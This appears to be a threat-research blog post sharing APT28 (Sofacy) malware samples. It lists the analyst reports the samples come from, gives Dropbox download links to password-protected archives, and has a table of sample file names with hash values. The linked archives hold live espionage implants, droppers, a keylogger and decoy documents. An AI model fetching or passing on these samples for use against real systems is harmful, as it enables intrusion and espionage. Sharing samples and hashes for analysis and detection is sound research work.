<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE-UECwIFIJjdjvu0IWTqD2Zg_hvQ5eMGWAjnfMcABK9PgBbAJoY7QoTt3MftSKEwVNPzLGkYG1eGGC7gPL2Rl8YoEdJb79AlHakKM_-Ea7TdWG7obF8s8njPASJ4m2tqEfT6EDU8AaJs/s1600/go_west.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br />
</a><br />
<div>
The post contains malware samples analyzed in the APT28 reports linked below. I will post APT29 and others later.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
<br />
Read about groups and types of targeted threats here: <a href="https://attack.mitre.org/wiki/Groups#scite-a0b31520c0bb02f1e5e011f948303052">Mitre ATT&CK</a><br />
<br /></div>
<div>
List of References (and samples mentioned) listed from oldest to newest:</div>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li><a href="http://telussecuritylabs.com/threats/show/TSL20110908-01">APT28_2011-09_Telus_Trojan.Win32.Sofacy.A</a></li>
<li><a href="http://malware.prevenity.com/2014/08/malware-info.html">APT28_2014-08_MhtMS12-27_Prevenity</a></li>
<li><a href="http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</a></li>
<li><a href="http://telussecuritylabs.com/threats/show/TSL20141028-04">APT28_2014-10_Telus_Coreshell.A</a></li>
<li><a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf">APT28_2014-10_TrendMicro Operation Pawn Storm</a>. <a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf">Using Decoys to Evade Detection</a></li>
<li><a href="https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/">APT28_2015-07_Digital Attack on German Parliament</a></li>
<li><a href="http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/">APT28_2015-07_ESET_Sednit_meet_Hacking</a></li>
<li><a href="http://telussecuritylabs.com/threats/show/TSL20150713-04">APT28_2015-07_Telus_Trojan-Downloader.Win32.Sofacy.B</a></li>
<li><a href="https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf">APT28_2015-09_Root9_APT28_Technical_Followup</a></li>
<li><a href="https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/">APT28_2015-09_SFecure_Sofacy-recycles-carberp-and-metasploit-code</a></li>
<li><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/">APT28_2015-10_New Adobe Flash Zero-Day Used in Pawn Storm</a></li>
<li><a href="https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf">APT28_2015-10_Root9_APT28_targets Financial Markets</a></li>
<li><a href="https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf">APT28_2015-12_Bitdefender_In-depth_analysis_of_APT28–The_Political_Cyber-Espionage</a></li>
<li><a href="https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/">APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets</a></li>
<li><a href="https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjP9crWt5_SAhWE0YMKHcDcBbIQFggcMAA&url=http%3A%2F%2Fdownload.microsoft.com%2Fdownload%2F4%2F4%2FC%2F44CDEF0E-7924-4787-A56A-16261691ACE3%2FMicrosoft_Security_Intelligence_Report_Volume_19_English.pdf&usg=AFQjCNGSplGdXhnWT7cDdZ7vz0DmPFlPYw&sig2=HljDg3xUg1mB0C_rY5bN-Q">APT28_2015_06_Microsoft_Security_Intelligence_Report_V19</a></li>
<li><a href="http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/">APT28_2016-02_PaloAlto_Fysbis Sofacy Linux Backdoor</a></li>
<li><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</a> <span style="color: red;"><< DNC (NOTE: this is APT29)</span></li>
<li><a href="https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/">APT28_2016-07_Invincea_Tunnel of Gov DNC Hack and the Russian XTunnel</a></li>
<li><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf">APT28_2016-10_ESET_Observing the Comings and Goings</a></li>
<li><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf">APT28_2016-10_ESET_Sednit A Mysterious Downloader</a></li>
<li><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf">APT28_2016-10_ESET_Sednit Approaching the Target</a></li>
<li><a href="http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf">APT28_2016-10_Sekoia_Rootkit analysisUse case on HideDRV</a></li>
<li><a href="https://labs.bitdefender.com/2017/02/new-xagent-mac-malware-linked-with-the-apt28/">APT28_2017-02_Bitdefender_OSX_XAgent</a> <span style="color: red;"><< OSX XAgent</span></li>
</ol>
<div>
<span style="color: red;"><br />
</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; line-height: 19.6px;">
</div>
<div style="background-color: #618f2b; color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>Download</b></span></div>
<br class="Apple-interchange-newline" />
<br class="Apple-interchange-newline" />
<img border="0" data-pin-nopin="true" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; color: #274e13; font-family: "courier new", courier, monospace; line-height: 19.6px; padding: 0px; position: relative;" /><a href="https://www.dropbox.com/sh/fwmhcw37o0u7f6p/AADADt2XkojibPzLBBxaQbbqa?dl=0">Download sets (matching research listed above). Email me if you need the password</a><br />
<a href="https://www.dropbox.com/s/g4fg52kujv7fmzf/APT28-samp.zip?dl=0"> Download all files/folders listed </a>(72MB)<br />
<div>
<br /></div>
<div>
<br style="background-color: white;" />
<div>
</div>
<br />
<div>
<div style="background-color: #618f2b; color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>Sample list</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><b><br />
</b></span></div>
<a href="https://www.dropbox.com/s/htzh42yrze5045m/pakfil.zip?dl=0" style="background-color: white; color: #660000; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; text-decoration: none;" target="_blank"></a></div>
<div>
<br />
<a name='more'></a><div class="site-instruction" style="border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.1em; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 0.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<br /></div>
<div class="samplearea" style="border: 0px; color: #1c1c1c; font-family: Raleway, Helvetica, Arial, sans-serif; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px 0px 2em; padding: 0px; text-align: center; vertical-align: baseline;">
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); font-family: Arial, Helvetica, sans-serif; font-size: 12px; margin: 0px auto;"><thead>
<tr class="tableizer-firstrow"><th style="background-color: #104e8b; color: white; text-align: left;">Parent Folder</th><th style="background-color: #104e8b; color: white; text-align: left;">File Name (SHA1)</th><th style="background-color: #104e8b; color: white; text-align: left;">MD5 Checksum</th><th style="background-color: #104e8b; color: white; text-align: left;">SHA256 Checksum</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2011-09_Telus_Trojan.Win32.Sofacy.A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2011-09_Telus_Trojan.Win32.Sofacy.A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">28F21E96E0722DD6FC7D6E1275F352BD060ADE0D</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1e217668d89b480ad42e230e8c2c4d97</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1feb41c4a64a7588d1e8e02497627654e9d031e7020d010541d8a8626447dbe9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2011-09_Telus_Trojan.Win32.Sofacy.A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">72CFD996957BDE06A02B0ADB2D66D8AA9C25BF37</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ed7f6260dec470e81dafb0e63bafb5ae</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7313eaf95a8a8b4c206b9afe306e7c0675a21999921a71a5a16456894571d21d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2011-09_Telus_Trojan.Win32.Sofacy.A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">AC6B465A13370F87CF57929B7CFD1E45C3694585</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e1554b931affb3cd2edc90bc58028078</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5ab8ef93fdeaac9af258845ab52c24d31140c8fffc5fdcf465529c8e00c508ac</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2011-09_Telus_Trojan.Win32.Sofacy.A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C01B02CCC86ACBD9B266B09D2B693CB39A2C6809</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9e4817f7bf36a61b363e0911cc0f08b9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">31a0906b0d8b07167129e134009dc307c2d92522da5709e52b67d3c5a70adf93</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-08_MhtMS12-27_Prevenity</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-08_MhtMS12-27_Prevenity</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">33EEC0D1AE550FB33874EDCE0138F485538BB21B__.mht_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d3de5b8500453107d6d152b3c8506935</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">55038c4326964f480fd2160b6b2a7aff9e980270d7765418937b3daeb4e82814</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-08_MhtMS12-27_Prevenity</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8DEF0A554F19134A5DB3D2AE949F9500CE3DD2CE_filee.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">16a6c56ba458ec718b4e9bc8f9f10785</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ce554d57333bdbccebb5e2e8d16a304947981e48ea2a5cc3d5f4ced7c1f56df3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-08_MhtMS12-27_Prevenity</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A8551397E1F1A2C0148E6EADCB56FA35EE6009CA_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">48656a93f9ba39410763a2196aabc67f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c8087186a215553d2f95c68c03398e17e67517553f6e9a8adc906faa51bce946</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-08_MhtMS12-27_Prevenity</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E338A57C35A4732BBB5F738E2387C1671A002BCB_advstorshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d7a625779df56d874871bb632f3e3106</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">11097a7a3336e0ab124fa921b94e3d51c4e9e4424e140e96127bfcf1c10ef110</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">367D40465FD1633C435B966FA9B289188AA444BC__tmp64.dat_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">791428601ad12b9230b9ace4f2138713</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">29cc2e69f65b9ce5fe04eb9b65942b2dabf48e41770f0a49eb698271b99d2787</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6316258CA5BA2D85134AD7427F24A8A51CE4815B_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">da2a657dc69d7320f2ffc87013f257ad</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d54173be095b688016528f18dc97f2d583efcf5ce562ec766afc0b294eb51ac7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">682E49EFA6D2549147A21993D64291BFA40D815A_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3b0ecd011500f61237c205834db0e13a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7f6f9645499f5840b59fb59525343045abf91bc57183aae459dca98dc8216965</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">85522190958C82589FA290C0835805F3D9A2F8D6_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8b92fe86c5b7a9e34f433a6fbac8bc3a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">03ed773bde6c6a1ac3b24bde6003322df8d41d3d1c85109b8669c430b58d2f69</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A8551397E1F1A2C0148E6EADCB56FA35EE6009CA_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">48656a93f9ba39410763a2196aabc67f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c8087186a215553d2f95c68c03398e17e67517553f6e9a8adc906faa51bce946</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">CF3220C867B81949D1CE2B36446642DE7894C6DC_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5882fda97fdf78b47081cc4105d44f7c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">744f2a1e1a62dff2a8d5bd273304a4d21ee37a3c9b0bdcffeeca50374bd10a39</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D87B310AA81AE6254FFF27B7D57F76035F544073_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">272f0fde35dbdfccbca1e33373b3570d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">423a0799efe41b28a8b765fa505699183c8278d5a7bf07658b3bd507bfa5346f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D9C53ADCE8C35EC3B1E015EC8011078902E6800B_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1259c4fe5efd9bf07fc4c78466f2dd09</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">102b0158bcd5a8b64de44d9f765193dd80df1504e398ce52d37b7c8c33f2552a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E2450DFFA675C61AA43077B25B12851A910EEEB6_ coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9eebfebe3987fec3c395594dc57a0c4c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e6d09ce32cc62b6f17279204fac1771a6eb35077bb79471115e8dfed2c86cd75</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ED48EF531D96E8C7360701DA1C57E2FF13F12405_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ead4ec18ebce6890d20757bb9f5285b1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7695f20315f84bb1d940149b17dd58383210ea3498450b45fefa22a450e79683</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F5B3E98C6B5D65807DA66D50BD5730D35692174D_asdfasdf.dat_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8c4fa713c5e2b009114adda758adc445</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d58f2a799552aff8358e9c63a4345ea971b27edd14b8eac825db30a8321d1a7a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Telus_Coreshell.A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_Telus_Coreshell.A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D87B310AA81AE6254FFF27B7D57F76035F544073_coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">272f0fde35dbdfccbca1e33373b3570d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">423a0799efe41b28a8b765fa505699183c8278d5a7bf07658b3bd507bfa5346f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0A3E6607D5E9C59C712106C355962B11DA2902FC_Case2_S.vbs_exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">db9edafbadd71c7a3a0f0aec1b216a92</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b3d624c4287795a7fbddd617f57705153d30f5f4c4d2d1fec349ac2812c3a8a0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0E12C8AB9B89B6EB6BAF16C4B3BBF9530067963F_Case2_Military CooperationDecoy.doc_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7fcf20302404f644fb07fe9d4fe9ac84</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">77166146463b9124e075f3a7925075f969974e32746c78d022ba99f578b9f0bb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14BEEB0FC5C8C887D0435009730B6370BF94BC93_Case5Payload2_netids.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">35717cd78ce713067a5037286cf91c3e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1b3dd8aaafd750aa85185dc52672b26d67d662796847d7cbb01a35b565e74d35</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3814EEC8C45FC4313A9C7F65CE882A7899CF0405_Case4_NetIds.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a24552843b9fedd7d0084e1eb1dd6e35</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">966660738c9e3ec103c2f8fe361c8ac20647cacaa5153197fa1917e9da99082e</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4B8806FE8E0CB49E4AA5D8F87766415A2DB1E9A9_Case2dropper_cryptmodule.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">41e14894f4ad9494e0359ee5bb3d9745</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">684f4b9ea61e14a15e82cac25076c5afe2d30e3dad7ce0b1b375b24d81135c37</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">550ABD71650BAEA05A0071C4E084A803CB413C31_Case2_skype.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7276d1dab1125f59604252159e0c529c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">81f0f5fcb3cb8a63e8a3713b4107b89d888cb722cb6c7586c7fcdb45f5310174</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">55318328511961EC339DFDDCA0443068DCCE9CD2_Case3_conhost.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">f1704aaf08cd66a2ac6cf8810c9e07c2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">74bdd9c250b0f4f27c0ecfeca967f53b35265c785d67406cc5e981a807d741bd</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5A452E7248A8D3745EF53CF2B1F3D7D8479546B9_Case3_netui.dll_keylog</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">aa3e6af90c144112a1ad0c19bdf873ff</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4536650c9c5e5e1bb57d9bedf7f9a543d6f09addf857f0d802fb64e437b6844a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6ADA11C71A5176A82A8898680ED1EAA4E79B9BC3_Case1_Letter to IAEA.pdf_decoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">76d3eb8c2bed4f2588e22b8d0984af86</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b0f1f553a847f3244f434541edbf26904e2de18cca8db8f861ea33bb70942b61</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6B875661A74C4673AE6EE89ACC5CB6927CA5FD0D_Case2Payload2_ netids.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">42bc93c0caddf07fce919d126a6e378f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9392776d6d8e697468ab671b43dce2b7baf97057b53bd3517ecd77a081eff67d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">72CFD996957BDE06A02B0ADB2D66D8AA9C25BF37_Case1_saver.scr_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ed7f6260dec470e81dafb0e63bafb5ae</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7313eaf95a8a8b4c206b9afe306e7c0675a21999921a71a5a16456894571d21d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">78D28072FDABF0B5AAC5E8F337DC768D07B63E1E_Case5_IDF_Spokesperson_Terror_Attack_011012.doc_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1ac15db72e6d4440f0b4f710a516b165</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0cccb9d951ba888c0c37bb0977fbb3682c09f9df1b537eede5a1601e744a01ad</td></tr>
